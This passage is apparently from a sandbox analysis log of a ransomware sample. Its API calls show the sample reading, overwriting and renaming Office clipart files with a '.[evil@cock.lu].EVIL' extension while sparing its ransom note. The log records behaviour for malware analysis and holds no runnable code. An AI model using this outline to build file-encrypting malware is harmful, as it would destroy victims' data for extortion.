(normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02446_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.478] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa34, lpOverlapped=0x0) returned 1 [0161.481] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.481] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.481] _errno () returned 0x84b1160840 [0161.481] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.481] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa40, lpOverlapped=0x0) returned 1 [0161.481] CloseHandle (hObject=0x1a8) returned 1 [0161.481] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02446_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.482] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.482] __uncaught_exception () returned 0x84b1160800 [0161.482] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.482] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02446_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02446_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02446_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02446_.wmf.[evil@cock.lu].evil")) returned 1 [0161.483] ??_V@YAXPEAX@Z () returned 0x1 [0161.486] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02446_.WMF", dwFileAttributes=0x200) returned 0 [0161.486] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.486] wcsstr (_Str="NA02448_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.486] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02448_.WMF") returned 69 [0161.486] wcscmp (_String1="NA02448_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.486] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02448_.WMF") returned 0x0 [0161.486] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02448_.WMF") returned 0x45 [0161.486] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02448_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02448_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.488] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8a0, lpOverlapped=0x0) returned 1 [0161.491] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.491] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.491] _errno () returned 0x84b1160840 [0161.491] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.491] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8c0, lpOverlapped=0x0) returned 1 [0161.492] CloseHandle (hObject=0x1a8) returned 1 [0161.492] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02448_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.492] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.492] __uncaught_exception () returned 0x84b1160800 [0161.492] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.492] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02448_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02448_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02448_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02448_.wmf.[evil@cock.lu].evil")) returned 1 [0161.493] ??_V@YAXPEAX@Z () returned 0x1 [0161.496] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02448_.WMF", dwFileAttributes=0x200) returned 0 [0161.496] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.496] wcsstr (_Str="NA02450_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.496] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02450_.WMF") returned 69 [0161.496] wcscmp (_String1="NA02450_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.496] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02450_.WMF") returned 0x0 [0161.496] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02450_.WMF") returned 0x45 [0161.496] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02450_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02450_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.499] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc28, lpOverlapped=0x0) returned 1 [0161.502] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.502] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.502] _errno () returned 0x84b1160840 [0161.502] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.502] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc40, lpOverlapped=0x0) returned 1 [0161.502] CloseHandle (hObject=0x1a8) returned 1 [0161.502] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02450_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.502] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.502] __uncaught_exception () returned 0x84b1160800 [0161.502] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.503] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02450_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02450_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02450_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02450_.wmf.[evil@cock.lu].evil")) returned 1 [0161.504] ??_V@YAXPEAX@Z () returned 0x1 [0161.507] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02450_.WMF", dwFileAttributes=0x200) returned 0 [0161.507] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.507] wcsstr (_Str="NA02451_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.507] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02451_.WMF") returned 69 [0161.507] wcscmp (_String1="NA02451_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.507] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02451_.WMF") returned 0x0 [0161.507] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02451_.WMF") returned 0x45 [0161.507] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02451_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02451_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.509] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd70, lpOverlapped=0x0) returned 1 [0161.512] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.512] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.512] _errno () returned 0x84b1160840 [0161.512] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.512] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xd80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd80, lpOverlapped=0x0) returned 1 [0161.512] CloseHandle (hObject=0x1a8) returned 1 [0161.512] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02451_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.512] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.512] __uncaught_exception () returned 0x84b1160800 [0161.512] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.513] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02451_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02451_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02451_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02451_.wmf.[evil@cock.lu].evil")) returned 1 [0161.513] ??_V@YAXPEAX@Z () returned 0x1 [0161.516] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02451_.WMF", dwFileAttributes=0x200) returned 0 [0161.517] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.517] wcsstr (_Str="NA02453_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.517] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02453_.WMF") returned 69 [0161.517] wcscmp (_String1="NA02453_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.517] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02453_.WMF") returned 0x0 [0161.517] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02453_.WMF") returned 0x45 [0161.517] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02453_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.519] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd3c, lpOverlapped=0x0) returned 1 [0161.541] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.541] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.542] _errno () returned 0x84b1160840 [0161.542] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.542] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd40, lpOverlapped=0x0) returned 1 [0161.542] CloseHandle (hObject=0x1a8) returned 1 [0161.542] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02453_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.542] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.542] __uncaught_exception () returned 0x84b1160800 [0161.542] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.543] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02453_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02453_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02453_.wmf.[evil@cock.lu].evil")) returned 1 [0161.543] ??_V@YAXPEAX@Z () returned 0x1 [0161.547] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02453_.WMF", dwFileAttributes=0x200) returned 0 [0161.547] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.547] wcsstr (_Str="NBOOK_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.547] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 69 [0161.547] wcscmp (_String1="NBOOK_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.547] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NBOOK_01.MID") returned 0x0 [0161.547] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 0x45 [0161.547] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\nbook_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.549] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1750, lpOverlapped=0x0) returned 1 [0161.567] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.567] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.567] _errno () returned 0x84b1160840 [0161.567] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.567] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1760, lpOverlapped=0x0) returned 1 [0161.567] CloseHandle (hObject=0x1a8) returned 1 [0161.567] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.568] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.568] __uncaught_exception () returned 0x84b1160800 [0161.568] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.568] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\nbook_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\nbook_01.mid.[evil@cock.lu].evil")) returned 1 [0161.569] ??_V@YAXPEAX@Z () returned 0x1 [0161.572] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID", dwFileAttributes=0x200) returned 0 [0161.572] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.572] wcsstr (_Str="OCEAN_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.572] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 69 [0161.572] wcscmp (_String1="OCEAN_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.572] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="OCEAN_01.MID") returned 0x0 [0161.572] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 0x45 [0161.572] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ocean_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.574] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1540, lpOverlapped=0x0) returned 1 [0161.615] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.615] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.615] _errno () returned 0x84b1160840 [0161.615] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.615] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1560, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1560, lpOverlapped=0x0) returned 1 [0161.615] CloseHandle (hObject=0x1a8) returned 1 [0161.615] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.615] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.616] __uncaught_exception () returned 0x84b1160800 [0161.616] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.616] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ocean_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ocean_01.mid.[evil@cock.lu].evil")) returned 1 [0161.617] ??_V@YAXPEAX@Z () returned 0x1 [0161.619] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID", dwFileAttributes=0x200) returned 0 [0161.620] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.620] wcsstr (_Str="OUTDR_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.620] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 69 [0161.620] wcscmp (_String1="OUTDR_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.620] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="OUTDR_01.MID") returned 0x0 [0161.620] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 0x45 [0161.620] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\outdr_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.622] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x19f4, lpOverlapped=0x0) returned 1 [0161.627] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.627] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.627] _errno () returned 0x84b1160840 [0161.627] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.627] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1a00, lpOverlapped=0x0) returned 1 [0161.628] CloseHandle (hObject=0x1a8) returned 1 [0161.628] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.628] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.628] __uncaught_exception () returned 0x84b1160800 [0161.628] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.629] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\outdr_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\outdr_01.mid.[evil@cock.lu].evil")) returned 1 [0161.630] ??_V@YAXPEAX@Z () returned 0x1 [0161.634] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID", dwFileAttributes=0x200) returned 0 [0161.634] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.634] wcsstr (_Str="PAPER_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.634] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 69 [0161.634] wcscmp (_String1="PAPER_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.634] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PAPER_01.MID") returned 0x0 [0161.634] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 0x45 [0161.634] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\paper_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.636] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | 